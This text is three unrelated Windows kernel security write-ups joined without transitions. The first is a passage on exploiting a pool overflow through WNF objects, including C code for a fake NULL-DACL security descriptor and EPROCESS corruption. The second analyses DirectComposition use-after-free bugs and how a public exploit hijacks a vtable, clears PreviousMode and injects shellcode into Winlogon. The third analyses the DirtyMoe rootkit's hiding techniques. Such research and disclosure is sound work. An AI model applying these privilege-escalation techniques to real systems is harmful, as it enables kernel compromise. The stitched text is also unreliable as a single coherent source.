As mentioned within Playing with the Windows Notification Facility, each _WNF_NAME_INSTANCE is sorted and put into an AVL tree based on its StateName.

There is the external version of the StateName which is the internal version of the StateName XOR’d with 0x41C64E6DA3BC0074.

For example, the external StateName value 0x41c64e6da36d9945 would become the following internally:

1: kd> dx -id 0,0,ffff8d87686c8080 -r1 (*((ntkrnlmp!_WNF_STATE_NAME_STRUCT *)0xffffdd09b35c8348))
(*((ntkrnlmp!_WNF_STATE_NAME_STRUCT *)0xffffdd09b35c8348))                 [Type: _WNF_STATE_NAME_STRUCT]
    [+0x000 ( 3: 0)] Version          : 0x1 [Type: unsigned __int64]
    [+0x000 ( 5: 4)] NameLifetime     : 0x3 [Type: unsigned __int64]
    [+0x000 ( 9: 6)] DataScope        : 0x4 [Type: unsigned __int64]
    [+0x000 (10:10)] PermanentData    : 0x0 [Type: unsigned __int64]
    [+0x000 (63:11)] Sequence         : 0x1a33 [Type: unsigned __int64]
1: kd> dc 0xffffdd09b35c8348
ffffdd09`b35c8348  00d19931

Or in bitwise operations:

Version = InternalName & 0xf
LifeTime = (InternalName >> 4) & 0x3
DataScope = (InternalName >> 6) & 0xf
IsPermanent = (InternalName >> 0xa) & 0x1
Sequence = InternalName >> 0xb
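These conversions are easy to reproduce in a small helper; purely illustrative, using the XOR constant from above (the example external name 0x41c64e6da36d9945 maps to internal 0x00d19931, matching the dump):

/* Illustrative helpers for the external <-> internal StateName mapping. */
#include <stdint.h>
#include <stdio.h>

#define WNF_XOR_KEY 0x41C64E6DA3BC0074ULL

static uint64_t WnfExternalToInternal(uint64_t ext) { return ext ^ WNF_XOR_KEY; }
static uint64_t WnfInternalToExternal(uint64_t in)  { return in  ^ WNF_XOR_KEY; }

int main(void)
{
    uint64_t internal = WnfExternalToInternal(0x41c64e6da36d9945ULL);   /* 0x00d19931 */
    printf("Version   = %llu\n",  (unsigned long long)( internal         & 0xf));  /* 1      */
    printf("LifeTime  = %llu\n",  (unsigned long long)((internal >> 4)   & 0x3));  /* 3      */
    printf("DataScope = %llu\n",  (unsigned long long)((internal >> 6)   & 0xf));  /* 4      */
    printf("Permanent = %llu\n",  (unsigned long long)((internal >> 0xa) & 0x1));  /* 0      */
    printf("Sequence  = 0x%llx\n", (unsigned long long)(internal >> 0xb));          /* 0x1a33 */
    return 0;
}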

The key thing to realise here is that whilst Version, LifeTime and DataScope are controlled, the Sequence number for WnfTemporaryStateName state names is stored in a global.

As you can see from the below, based on the DataScope either the current Silo Globals or the Server Silo Globals are offset into to obtain v10, and this is then used as the Sequence, which is incremented by 1 each time.

Then, in order to look up a name instance, the following code path is taken:

i[3] in this case is actually the StateName of a _WNF_NAME_INSTANCE structure, as it lies just outside the _RTL_BALANCED_NODE (TreeLinks) being walked; the tree itself is rooted off the NameSet member of a _WNF_SCOPE_INSTANCE structure.

Each _WNF_NAME_INSTANCE is joined to the others via its TreeLinks element. The tree traversal code above therefore walks the AVL tree and uses it to find the correct StateName.

One challenge from a memory corruption perspective is that whilst you can determine the external and internal StateNames of the objects which have been heap sprayed, you don’t necessarily know which of the objects will be adjacent to the NTFS chunk which is being overflowed.

However, with careful crafting of the pool overflow, we can guess the appropriate value to set the _WNF_NAME_INSTANCE structure’s StateName to be.

It is also possible to construct your own AVL tree by corrupting the TreeLinks pointers; however, the main caveat with that is that care needs to be taken to avoid triggering safe unlinking protection.

As we can see from Windows Mitigations, Microsoft has implemented a significant number of mitigations to make heap and pool exploitation more difficult.

In a future blog post I will discuss in depth how this affects this specific exploit and what clean-up is necessary.

Security Descriptor

One other challenge I ran into whilst developing this exploit was due to the security descriptor.

Initially I set this to be the address of a security descriptor within userland, which was used in NtCreateWnfStateName.

Performing some comparisons between an unmodified security descriptor within kernel space and the one in userspace demonstrated that these were different.

Kernel space:

1: kd> dx -id 0,0,ffffce86a715f300 -r1 ((ntkrnlmp!_SECURITY_DESCRIPTOR *)0xffff9e8253eca5a0)
((ntkrnlmp!_SECURITY_DESCRIPTOR *)0xffff9e8253eca5a0)                 : 0xffff9e8253eca5a0 [Type: _SECURITY_DESCRIPTOR *]
    [+0x000] Revision         : 0x1 [Type: unsigned char]
    [+0x001] Sbz1             : 0x0 [Type: unsigned char]
    [+0x002] Control          : 0x800c [Type: unsigned short]
    [+0x008] Owner            : 0x0 [Type: void *]
    [+0x010] Group            : 0x28000200000014 [Type: void *]
    [+0x018] Sacl             : 0x14000000000001 [Type: _ACL *]
    [+0x020] Dacl             : 0x101001f0013 [Type: _ACL *]

After repointing the security descriptor to the userland structure:

1: kd> dx -id 0,0,ffffce86a715f300 -r1 ((ntkrnlmp!_SECURITY_DESCRIPTOR *)0x23ee3ab6ea0)
((ntkrnlmp!_SECURITY_DESCRIPTOR *)0x23ee3ab6ea0)                 : 0x23ee3ab6ea0 [Type: _SECURITY_DESCRIPTOR *]
    [+0x000] Revision         : 0x1 [Type: unsigned char]
    [+0x001] Sbz1             : 0x0 [Type: unsigned char]
    [+0x002] Control          : 0xc [Type: unsigned short]
    [+0x008] Owner            : 0x0 [Type: void *]
    [+0x010] Group            : 0x0 [Type: void *]
    [+0x018] Sacl             : 0x0 [Type: _ACL *]
    [+0x020] Dacl             : 0x23ee3ab4350 [Type: _ACL *]

I then attempted to provide a fake security descriptor with the same values. This didn’t work as expected and NtUpdateWnfStateData was still returning permission denied (-1073741790).

Ok then! Let’s just make the DACL NULL, so that the Everyone group has Full Control permissions.

After experimenting some more, patching up a fake security descriptor with the following values worked and the data was successfully written to my arbitrary location:

SECURITY_DESCRIPTOR* sd = (SECURITY_DESCRIPTOR*)malloc(sizeof(SECURITY_DESCRIPTOR));
sd->Revision = 0x1;
sd->Sbz1 = 0;
sd->Control = 0x800c;
sd->Owner = 0;
sd->Group = (PSID)0;
sd->Sacl = (PACL)0;
sd->Dacl = (PACL)0;

EPROCESS Corruption

Initially, when testing out the arbitrary write, I was expecting that when I set the StateData pointer to 0x6161616161616161 a kernel crash would occur near the memcpy location. However, in practice the execution of ExpWnfWriteStateData was found to be performed in a worker thread. When an access violation occurs, it is caught and the NT status -1073741819 (STATUS_ACCESS_VIOLATION) is propagated back to userland. This made initial debugging more challenging, as the code around that function is a significantly hot path, and conditional breakpoints led to a huge program standstill.

Anyhow, typically after achieving an arbitrary write an attacker will leverage it either to perform a data-only privilege escalation or to achieve arbitrary code execution.

As we are using CVE-2021-31955 for the EPROCESS address leak we continue our research down this path.

To recap, the following conditions needed to be met:

1) The internal StateName matching up so that the correct external StateName can be found when required.
2) The security descriptor passing the checks in ExpWnfCheckCallerAccess.
3) The offsets of DataSize and AllocatedSize being appropriate for the area of memory targeted.

So in summary we have the following memory layout after the overflow has occurred and the EPROCESS being treated as a _WNF_STATE_DATA:

We can then demonstrate corrupting the EPROCESS struct:

PROCESS ffff8881dc84e0c0
    SessionId: 1  Cid: 13fc    Peb: c2bb940000  ParentCid: 1184
    DirBase: 4444444444444444  ObjectTable: ffffc7843a65c500  HandleCount:  39.
    Image: TestEAOverflow.exe

PROCESS ffff8881dbfee0c0
    SessionId: 1  Cid: 073c    Peb: f143966000  ParentCid: 13fc
    DirBase: 135d92000  ObjectTable: ffffc7843a65ba40  HandleCount: 186.
    Image: conhost.exe

PROCESS ffff8881dc3560c0
    SessionId: 0  Cid: 0448    Peb: 825b82f000  ParentCid: 028c
    DirBase: 37daf000  ObjectTable: ffffc7843ec49100  HandleCount: 176.
    Image: WmiApSrv.exe

1: kd> dt _WNF_STATE_DATA ffffd68cef97a080+0x8
nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : 0xffffd68c
   +0x008 DataSize         : 0x100
   +0x00c ChangeStamp      : 2

1: kd> dc ffff8881dc84e0c0 L50
ffff8881`dc84e0c0  00000003 00000000 dc84e0c8 ffff8881  ................
ffff8881`dc84e0d0  00000100 41414142 44444444 44444444  ....BAAADDDDDDDD
ffff8881`dc84e0e0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e0f0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e100  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e110  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e120  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e130  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e140  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e150  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e160  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e170  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e180  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e190  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1a0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1b0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1c0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1d0  44444444 44444444 00000000 00000000  DDDDDDDD........
ffff8881`dc84e1e0  00000000 00000000 00000000 00000000  ................
ffff8881`dc84e1f0  00000000 00000000 00000000 00000000  ................

As you can see, EPROCESS+0x8 has been corrupted with attacker controlled data.

At this point typical approaches would be to either:

1) Target the KTHREAD structure’s PreviousMode member

2) Target the EPROCESS token

These approaches and their pros and cons have been discussed previously by EDG team members whilst exploiting a vulnerability in KTM.

The next stage will be discussed within a follow-up blog post as there are still some challenges to face before reliable privilege escalation is achieved.

Summary

In summary, we have described more about the vulnerability and how it can be triggered, and we have seen how WNF can be leveraged to enable a novel set of exploit primitives. That is all for now in part 1! In the next blog post I will cover reliability improvements, kernel memory clean-up and how the exploitation continues from here.

Analysis of DirectComposition Binding and Tracker object vulnerability

DirectComposition introduction

Microsoft DirectComposition is a Windows component that enables high-performance bitmap composition with transforms, effects, and animations. Application developers can use the DirectComposition API to create visually engaging user interfaces that feature rich and fluid animated transitions from one visual to another.[1]

The DirectComposition API provides a COM interface via dcomp.dll, calls into win32kbase.sys through win32u.dll export functions, and finally sends data to the client program dwm.exe (Desktop Window Manager) through ALPC to complete the graphics rendering operation:

win32u.dll (Windows 10 1909) provides the following export functions to handle the DirectComposition API:

The three functions related to triggering the vulnerability are NtDCompositionCreateChannel, NtDCompositionProcessChannelBatchBuffer and NtDCompositionCommitChannel:
(1) NtDCompositionCreateChannel creates a channel to communicate with the kernel:

typedef NTSTATUS(*pNtDCompositionCreateChannel)(
	OUT PHANDLE hChannel,
	IN OUT PSIZE_T pSectionSize,
	OUT PVOID* pMappedAddress
	);

(2) NtDCompositionProcessChannelBatchBuffer batches multiple commands:

typedef NTSTATUS(*pNtDCompositionProcessChannelBatchBuffer)(
    IN HANDLE hChannel,
    IN DWORD dwArgStart,
    OUT PDWORD pOutArg1,
    OUT PDWORD pOutArg2
    );

The batched commands are stored in the pMappedAddress memory returned by NtDCompositionCreateChannel. The command list is as follows:

enum DCOMPOSITION_COMMAND_ID
{
	ProcessCommandBufferIterator,
	CreateResource,
	OpenSharedResource,
	ReleaseResource,
	GetAnimationTime,
	CapturePointer,
	OpenSharedResourceHandle,
	SetResourceCallbackId,
	SetResourceIntegerProperty,
	SetResourceFloatProperty,
	SetResourceHandleProperty,
	SetResourceHandleArrayProperty,
	SetResourceBufferProperty,
	SetResourceReferenceProperty,
	SetResourceReferenceArrayProperty,
	SetResourceAnimationProperty,
	SetResourceDeletedNotificationTag,
	AddVisualChild,
	RedirectMouseToHwnd,
	SetVisualInputSink,
	RemoveVisualChild
};

The commands related to triggering the vulnerability are CreateResource, SetResourceBufferProperty and ReleaseResource. The data structures of the different commands differ:

(3) NtDCompositionCommitChannel serializes batch commands and sends them to dwm.exe for rendering through ALPC:

typedef NTSTATUS(*pNtDCompositionCommitChannel)(
	IN HANDLE hChannel,
	OUT PDWORD out1,
	OUT PDWORD out2,
	IN DWORD flag,
	IN HANDLE Object
	);
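A rough usage sketch of these three calls follows. The function-pointer types are the ones defined above; the syscall stubs are resolved from win32u.dll at runtime, and the actual encoding of batched commands into the mapped section (shown in the figures) is omitted, so the values passed to the batch call are placeholders:

#include <windows.h>

/* Assumes the pNtDCompositionCreateChannel / pNtDCompositionProcessChannelBatchBuffer /
 * pNtDCompositionCommitChannel typedefs from above are in scope. */
int main(void)
{
    HMODULE win32u = LoadLibraryA("win32u.dll");
    pNtDCompositionCreateChannel NtDCompositionCreateChannel_ =
        (pNtDCompositionCreateChannel)GetProcAddress(win32u, "NtDCompositionCreateChannel");
    pNtDCompositionProcessChannelBatchBuffer NtDCompositionProcessChannelBatchBuffer_ =
        (pNtDCompositionProcessChannelBatchBuffer)GetProcAddress(win32u, "NtDCompositionProcessChannelBatchBuffer");
    pNtDCompositionCommitChannel NtDCompositionCommitChannel_ =
        (pNtDCompositionCommitChannel)GetProcAddress(win32u, "NtDCompositionCommitChannel");

    HANDLE hChannel    = NULL;
    SIZE_T sectionSize = 0x4000;    /* negotiated with the kernel */
    PVOID  mapped      = NULL;
    NtDCompositionCreateChannel_(&hChannel, &sectionSize, &mapped);

    /* Batched commands (CreateResource / SetResourceBufferProperty / ReleaseResource)
     * would be written into 'mapped' here, then submitted and committed: */
    DWORD out1 = 0, out2 = 0;
    NtDCompositionProcessChannelBatchBuffer_(hChannel, 0 /* dwArgStart: depends on the batch */,
                                             &out1, &out2);
    NtDCompositionCommitChannel_(hChannel, &out1, &out2, 0 /* flag */, NULL /* Object */);
    return 0;
}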


CInteractionTrackerBindingManagerMarshaler::SetBufferProperty process analysis

First, use the CreateResource command to create a CInteractionTrackerBindingManagerMarshaler resource (ResourceType = 0x59, hereinafter referred to as “Binding”) and a CInteractionTrackerMarshaler resource (ResourceType = 0x58, hereinafter referred to as “Tracker”).
Then call the SetResourceBufferProperty command to set the Tracker object as the Binding object’s BufferProperty.
This process is handled by the function CInteractionTrackerBindingManagerMarshaler::SetBufferProperty, whose main flow is as follows:

The key steps are as follows (sketched in pseudo-code after this list):
(1) Check the input buffer: subcmd == 0 && bufsize == 0xc
(2) Get the Tracker objects tracker1 and tracker2 from channel->resource_list (+0x38) according to the resourceIds in the input buffer
(3) Check whether the types of tracker1 and tracker2 are CInteractionTrackerMarshaler (0x58)
(4) If binding->entry_count (+0x50) > 0, find the matching TrackerEntry in binding->tracker_list (+0x38) according to the handleIDs of tracker1 and tracker2, then update TrackerEntry->entry_id to the new_entry_id from the input buffer
(5) Otherwise, create a new TrackerEntry structure. If tracker1->binding == NULL || tracker2->binding == NULL, update their binding objects
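The following is a simplified paraphrase of those steps in pseudo-C; names and offsets come from the description above rather than the actual decompilation, and the control flow is approximate (for example, the new_entry_id != 0 condition discussed under CVE-2020-1381 is omitted):

/* Pseudo-code paraphrase of steps (1)-(5); not the real decompiled function. */
if (in->subcmd != 0 || in->bufsize != 0xc)                            /* (1) */
    return STATUS_INVALID_PARAMETER;

tracker1 = FindResourceById(channel->resource_list /* +0x38 */, in->resourceId1);  /* (2) */
tracker2 = FindResourceById(channel->resource_list /* +0x38 */, in->resourceId2);

if (Type(tracker1) != 0x58 || Type(tracker2) != 0x58)                 /* (3) */
    return STATUS_INVALID_PARAMETER;

if (binding->entry_count /* +0x50 */ > 0 &&
    (entry = FindTrackerEntry(binding->tracker_list /* +0x38 */, tracker1, tracker2))) {
    entry->entry_id = in->new_entry_id;                               /* (4) update existing entry   */
} else {
    AppendTrackerEntry(binding->tracker_list, tracker1, tracker2, in->new_entry_id);  /* (5) */
    if (tracker1->binding == NULL) tracker1->binding = binding;       /* +0x190, only when still NULL */
    if (tracker2->binding == NULL) tracker2->binding = binding;
}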

After SetBufferProperty, a reference relationship between the binding object and the tracker object is as follows:

When using the ReleaseResource command to release the Tracker object, the CInteractionTrackerMarshaler::ReleaseAllReferences function is called. ReleaseAllReferences checks internally whether the tracker object has a binding object:

If it has:
(1) Call RemoveTrackerBindings. In RemoveTrackerBindings, TrackerEntry.entry_id is set to 0 if the resourceID in tracker_list is equal to the resourceID of the freed tracker. CleanUpListItemsPendingDeletion is then called to delete the TrackerEntry entries whose entry_id == 0 from tracker_list:

(2) Call ReleaseResource to decrement the refcnt of the binding object by 1.

(3) Set tracker->binding (+0x190) = 0

Following the above process, an input command buffer that performs a normal SetBufferProperty flow is constructed as follows:

After SetBufferProperty, the memory layout of the binding1, tracker1 and tracker2 objects is as follows:

After ReleaseResource of tracker2, the memory layout of the binding1, tracker1 and tracker2 objects is as follows:

CVE-2020-1381

Looking back at the process of CInteractionTrackerBindingManagerMarshaler::SetBufferProperty, when new_entry_id != 0, a new TrackerEntry structure will be created:

If tracker1 and tracker2 have already been bound to binding1, then after binding tracker1 and tracker2 to binding2, a new TrackerEntry structure will be created for binding2. Since tracker->binding != NULL at this time, tracker->binding will still hold the binding1 pointer and will not be updated to the binding2 pointer. When the tracker is released, binding2->entry_list will retain the tracker’s dangling pointer.

Construct an input command buffer which can trigger the vulnerability as follows:

Memory layout after ReleaseResource of tracker1:

It can be seen that after ReleaseResource of tracker1, binding2->track_list[0] holds a dangling pointer to tracker1.

CVE-2021-26900

Analyzing the ‘new_entry_id != 0’ branch, the root cause of CVE-2020-1381 is that, when creating a TrackerEntry, there was no check of whether the tracker object had already been bound to a binding object. The patch adds a check of tracker->binding when creating the TrackerEntry:

CVE-2021-26900 is a bypass of the CVE-2020-1381 patch. The key to bypassing the patch is whether the condition tracker->binding == NULL can be constructed after the tracker has been bound to the binding object.
The bypass lies in the ‘update TrackerEntry’ branch:

When TrackerEntry->entry_id == 0, the RemoveBindingManagerReferenceFromTrackerIfNecessary function is called. It checks internally whether entry_id == 0 and then calls SetBindingManagerMarshaler to set tracker->binding = NULL:

Therefore, by setting entry_id=0 manually, the status of tracker->binding == NULL can be obtained, which can be used to bypass the CVE-2020-1381 patch.

Construct an input command buffer which can trigger the vulnerability as follows:

After setting entry_id=0 manually, the memory layout of binding1 and tracker1:

At this time, binding1->TrackerEntry still holds the pointer to tracker1, but tracker1->binding = NULL. Memory layout after ReleaseResource of tracker1:

It can be seen that after ReleaseResource of tracker1, binding1->track_list[0] holds a dangling pointer to tracker1.

CVE-2021-26868

Recall the method from CVE-2021-26900, which sets entry_id = 0 manually to obtain the tracker->binding == NULL state and bypass the CVE-2020-1381 patch, and the behaviour of CInteractionTrackerMarshaler::ReleaseAllReferences, which checks whether the tracker object has a binding object and then deletes the corresponding TrackerEntry.

So when entry_id is set to 0 manually, tracker->binding will be set to NULL. When the tracker object is then released via the ReleaseResource command, the TrackerEntry held by the binding object will not be deleted, and a dangling pointer to the tracker object is obtained once again.

Construct an input command buffer which can trigger the vulnerability as follows:

Memory layout after ReleaseResource of tracker1:

It can be seen that after ReleaseResource of tracker1, binding1->track_list[0] holds a dangling pointer to tracker1.

CVE-2021-33739

CVE-2021-33739 is different from the vulnerabilities in win32kbase.sys introduced in the previous sections. It is a UAF vulnerability in dwmcore.dll of the dwm.exe process. The root cause is in the ReleaseResource phase of CloseChannel: in the CInteractionTrackerBindingManager::RemoveTrackerBinding function call, when an element of Binding->hashmap (+0x40) is deleted, the hashmap is accessed directly without checking whether the Binding object has been released, which causes the UAF vulnerability.

Construct an input command buffer which can trigger the vulnerability as follows:

According to the previous analysis, in the normal scenario of a CInteractionTrackerBindingManagerMarshaler::SetBufferProperty function call, the Binding object should be bound to two different Tracker objects. However, if it is bound to the same Tracker object:

(1) Binding phase:
The CInteractionTrackerBindingManager::ProcessSetTrackerBindingMode function is called to process the binding operation, which internally calls CInteractionTrackerBindingManager::AddOrUpdateTrackerBindings to update Tracker->Binding (+0x278). When the Tracker has already been bound to the current Binding object, the binding operation will not be repeated:

Therefore, if the same Tracker object is already bound, the Binding object will not be bound again, so the refcnt of the Binding object ends up being increased by only 1:

(2) Release phase:
After PreRender is finished, CComposition::CloseChannel will be called to close the Channel and release the Resources in the Resource HandleTable. The Binding object is released first; at this time Binding->refcnt = 1:

Then the Tracker object will be released. CInteractionTrackerBindingManager::RemoveTrackerBindings will be called to release Tracker->Binding:

Three steps are included:
(1) Get the Tracker object from the TrackerEntry
(2) Erase the corresponding Tracker pointer from Binding->hashmap (+0x40)
(3) Remove Tracker->Binding from the Tracker object (decrementing Binding->refcnt)

The key problem is: after the cleanup of the first Tracker object in the TrackerEntry completes, the Binding object may already have been released. When the second Tracker object is about to be cleared, the validity of the Binding object is not checked before Binding->hashmap is accessed again, which results in an access violation exception.

Exploitation: Another way to occupy freed memory

For the kernel-object UAF exploitation, according to the publicly available exploit sample [5], a Palette object is used to occupy the freed memory.

The CInteractionTrackerBindingManagerMarshaler::EmitBoundTrackerMarshalerUpdateCommands function is then used to access the placeholder objects.

The hijacked call site is the virtual function CInteractionTrackerMarshaler::EmitUpdateCommands of the tracker1 and tracker2 objects (vtable + 0x50). Because the freed Tracker object has been reused by a Palette object, execution-flow hijacking is achieved by forging a virtual table and writing another function pointer at fake Tracker vtable + 0x50.
The public exploit sample selects nt!SeSetAccessStateGenericMapping as the target.

With the 16-byte write primitive provided by nt!SeSetAccessStateGenericMapping, the exploit sets _KTHREAD->PreviousMode = 0 and injects shellcode into the Winlogon process to complete the privilege escalation.

Another way to occupy freed memory

Exploitation with the Palette object is relatively common. Is there an object in the DirectComposition component with a user-mode-controllable memory size that can be exploited instead?

The Binding and Tracker objects discussed above belong to the Resources of DirectComposition. DirectComposition contains many Resource objects, which are created by DirectComposition::CApplicationChannel::CreateInternalResource.

Each Resource has a BufferProperty, which is set by the SetResourceBufferProperty command. So our objective is to find a Resource whose SetResourceBufferProperty command allocates a buffer with a user-mode-controllable size. Through searching, I found CTableTransferEffectMarshaler::SetBufferProperty.

When subcmd == 0, the bufferProperty is stored at CTableTransferEffectMarshaler+0x58. The size of the bufferProperty is set by the user-mode input bufferSize, and its content is copied from the user-mode input buffer.

The original sample can be modified to use the propertyBuffer of CTableTransferEffectMarshaler to occupy the freed memory.

By debugging, we can confirm that the propertyBuffer of CTableTransferEffectMarshaler occupies the freed memory successfully.

Finally, the exploitation completes successfully.

References

[1] https://docs.microsoft.com/en-us/windows/win32/directcomp/directcomposition-portal
[2] https://www.zerodayinitiative.com/blog/2021/5/3/cve-2021-26900-privilege-escalation-via-a-use-after-free-vulnerability-in-win32k
[3] https://github.com/thezdi/PoC/blob/master/CVE-2021-26900/CVE-2021-26900.c
[4] https://ti.dbappsecurity.com.cn/blog/articles/2021/06/09/0day-cve-2021-33739/
[5] https://github.com/Lagal1990/CVE-2021-33739-POC

DirtyMoe: Rootkit Driver

Abstract

In the first post, DirtyMoe: Introduction and General Overview of Modularized Malware, we described a complex and sophisticated piece of malware called DirtyMoe. The main observed roles of the malware are cryptojacking and DDoS attacks, which are still popular. There is no doubt that the malware has been released for profit, and all evidence points to Chinese territory. In most cases, the PurpleFox campaign is used to exploit vulnerable systems: the exploit gains the highest privileges and installs the malware via the MSI installer. In short, the installer misuses the Windows System Event Notification Service (SENS) for the malware deployment. At the end of the deployment, two processes (workers) execute malicious activities received from well-concealed C&C servers.

As we mentioned in the first post, every good malware must implement a set of protection, anti-forensics, anti-tracking, and anti-debugging techniques. One of the most frequently used techniques for hiding malicious activity is the use of rootkits. In general, the main goal of a rootkit is to hide the malware itself and other modules of the hosted malware at the kernel layer. Rootkits are potent tools but carry a high risk of being detected, because they work in kernel-mode and each critical bug leads to a BSoD.

The primary aim of this article is to analyze the rootkit techniques that DirtyMoe uses. The main part of this study examines the functionality of the DirtyMoe driver, aiming to provide comprehensive information about the driver in terms of static and dynamic analysis. The key techniques of the DirtyMoe rootkit can be listed as follows: the driver can hide itself and other malware activity in both kernel and user mode; it can execute commands received from user-mode with kernel privileges; it can inject an arbitrary DLL file into targeted processes; and, last but not least, it can censor the file system content. We also describe the refined routine that deploys the driver into the kernel and the anti-forensic methods the malware authors used.

Another essential point of this research is the investigation of the driver's metadata, which shows that the driver is code-signed with certificates that were stolen and revoked in the past. However, these certificates are widespread in the wild and are still being misused by other malicious software.

Finally, the last part summarises the rootkit functionality and draws together the key findings about the digital certificates, making a link between DirtyMoe and other malicious software. In addition, we discuss the implementation level and sources of the used rootkit techniques.

1. Sample

The subject of this research is a sample with SHA-256:
AABA7DB353EB9400E3471EAAA1CF0105F6D1FAB0CE63F1A2665C8BA0E8963A05
The sample is a Windows driver that DirtyMoe drops on system startup.

Note: VirusTotal records that 44 of 71 AV engines (62 %) detect the sample as malicious. By comparison, the DirtyMoe DLL file is detected by 86 % of registered AVs. Therefore, the detection coverage is sufficient, since the driver is dumped from the DLL file.

Basic Information
  • File Type: Portable Executable 64
  • File Info: Microsoft Visual C++ 8.0 (Driver)
  • File Size: 116.04 KB (118824 bytes)
  • Digital Signature: Shanghai Yulian Software Technology Co., Ltd. (上海域联软件技术有限公司)
Imports

The driver imports two libraries, FltMgr and ntoskrnl. Table 1 summarizes the most suspicious methods from the driver's point of view.

Routine                       Description
FltSetCallbackDataDirty       A minifilter driver's pre- or post-operation callback calls this routine to indicate that it has modified the contents of the callback data structure.
FltGetRequestorProcessId      Returns the process ID of the process that requested a given I/O operation.
FltRegisterFilter             Registers a minifilter driver.
ZwDeleteValueKey,
ZwSetValueKey,
ZwQueryValueKey,
ZwOpenKey                     Routines that delete, set, query, and open registry entries in kernel-mode.
ZwTerminateProcess            Terminates a process and all of its threads in kernel-mode.
ZwQueryInformationProcess     Retrieves information about the specified process.
MmGetSystemRoutineAddress     Returns a pointer to a function specified by a routine name parameter.
ZwAllocateVirtualMemory       Reserves a range of application-accessible virtual addresses in the specified process in kernel-mode.
Table 1. Kernel methods imported by the DirtyMoe driver

At first glance, the driver looks up kernel routines via MmGetSystemRoutineAddress() as a form of obfuscation, since the string table contains names of routines operating with virtual memory, e.g., ZwProtectVirtualMemory(), ZwReadVirtualMemory(), ZwWriteVirtualMemory(). The kernel routine ZwQueryInformationProcess() and strings such as services.exe and winlogon.exe suggest that the rootkit works with kernel structures of critical Windows processes.
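
As a rough illustration of this obfuscation pattern, the minimal kernel-mode sketch below resolves one of the routines named in the string table at run time. It is not the malware's code; the function-pointer type is simplified (a plain ULONG stands in for the PROCESSINFOCLASS value).

#include <ntddk.h>

// Hedged sketch: resolving a kernel routine at run time instead of importing it.
typedef NTSTATUS (NTAPI *PFN_ZW_QUERY_INFORMATION_PROCESS)(
    HANDLE ProcessHandle,
    ULONG ProcessInformationClass,   // simplified stand-in for PROCESSINFOCLASS
    PVOID ProcessInformation,
    ULONG ProcessInformationLength,
    PULONG ReturnLength);

static PFN_ZW_QUERY_INFORMATION_PROCESS ResolveZwQueryInformationProcess(VOID)
{
    UNICODE_STRING name;
    RtlInitUnicodeString(&name, L"ZwQueryInformationProcess");

    // Returns NULL when the routine is not exported by the kernel image.
    return (PFN_ZW_QUERY_INFORMATION_PROCESS)MmGetSystemRoutineAddress(&name);
}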

2. DirtyMoe Driver Analysis

The DirtyMoe driver does not execute any specific malware activities. However, it provides a wide scale of rootkit and backdoor techniques. The driver has been designed as a service support system for the DirtyMoe service in the user-mode.

The driver can perform actions that normally require high privileges, such as writing a file into the system folder, writing to the system registry, or killing an arbitrary process. The malware in user-mode just sends a defined control code and data to the driver, and the driver performs the higher-privilege action.

Further, the malware can use the driver to hide some records helping to mask malicious activities. The driver affects the system registry, and can conceal arbitrary keys. Moreover, the system process services.exe is patched in its memory, and the driver can exclude arbitrary services from the list of running services. Additionally, the driver modifies the kernel structures recording loaded drivers, so the malware can choose which driver is visible or not. Therefore, the malware is active, but the system and user cannot list the malware records using standard API calls to enumerate the system registry, services, or loaded drivers. The malware can also hide requisite files stored in the file system since the driver implements a mechanism of the minifilter. Consequently, if a user requests a record from the file system, the driver catches this request and can affect the query result that is passed to the user.

The driver consists of 10 main functionalities as Table 2 illustrates.

Function                  Description
Driver Entry              Routine called by the kernel when the driver is loaded.
Start Routine             Routine run as a kernel thread that restores the driver configuration from the system registry.
Device Control            Processes system-defined I/O control codes (IOCTLs) that control the driver from user-mode.
Minifilter Driver         Routine that completes processing for one or more types of I/O operations, QueryDirectory in this case; in other words, it filters folder enumerations.
Thread Notification       Registers a driver-supplied callback that is notified when a new thread is created.
Callback of NTFS Driver   Wraps the original callback of the NTFS driver for the IRP_MJ_CREATE major function.
Registry Hiding           Hook method that provides registry key hiding.
Service Hiding            Routine hiding a defined service.
Driver Hiding             Routine hiding a defined driver.
Driver Unload             Routine called by the kernel when the driver is unloaded.
Table 2. Main driver functionality

Most of the implemented functionalities are available as public samples on internet forums. The level of programming skills is different for each driver functionality. It seems that the driver author merged the public samples in most cases. Therefore, the driver contains a few bugs and unused code. The driver is still in development, and we will probably find other versions in the wild.

2.1 Driver Entry

The Driver Entry is the first routine called by the kernel after the driver is loaded. The driver initializes a large number of global variables for its proper operation. Firstly, the driver detects the OS version and sets up the required offsets for further malicious use. Secondly, a variable pointing to the driver image is initialized; the driver image is used for hiding the driver. The driver also associates the following major functions:

  1. IRP_MJ_CREATE, IRP_MJ_CLOSE – no action of interest,
  2. IRP_MJ_DEVICE_CONTROL – used for driver configuration and control,
  3. IRP_MJ_SHUTDOWN – writes malware-defined data into the disk and registry.

The Driver Entry creates a symbolic link to the driver and tries to register further malicious monitoring or filtering callbacks. The first one is a minifilter activated by the FltRegisterFilter() method registering FltPostOperation(), which filters access to the system drives and allows the driver to hide files and directories.

Further, the initialization method swaps the IRP_MJ_CREATE major function of the \FileSystem\Ntfs driver. So, each CreateFile() API call or kernel-mode IoCreateFile() call can be monitored and affected by the malicious MalNtfsCreatCallback() callback.

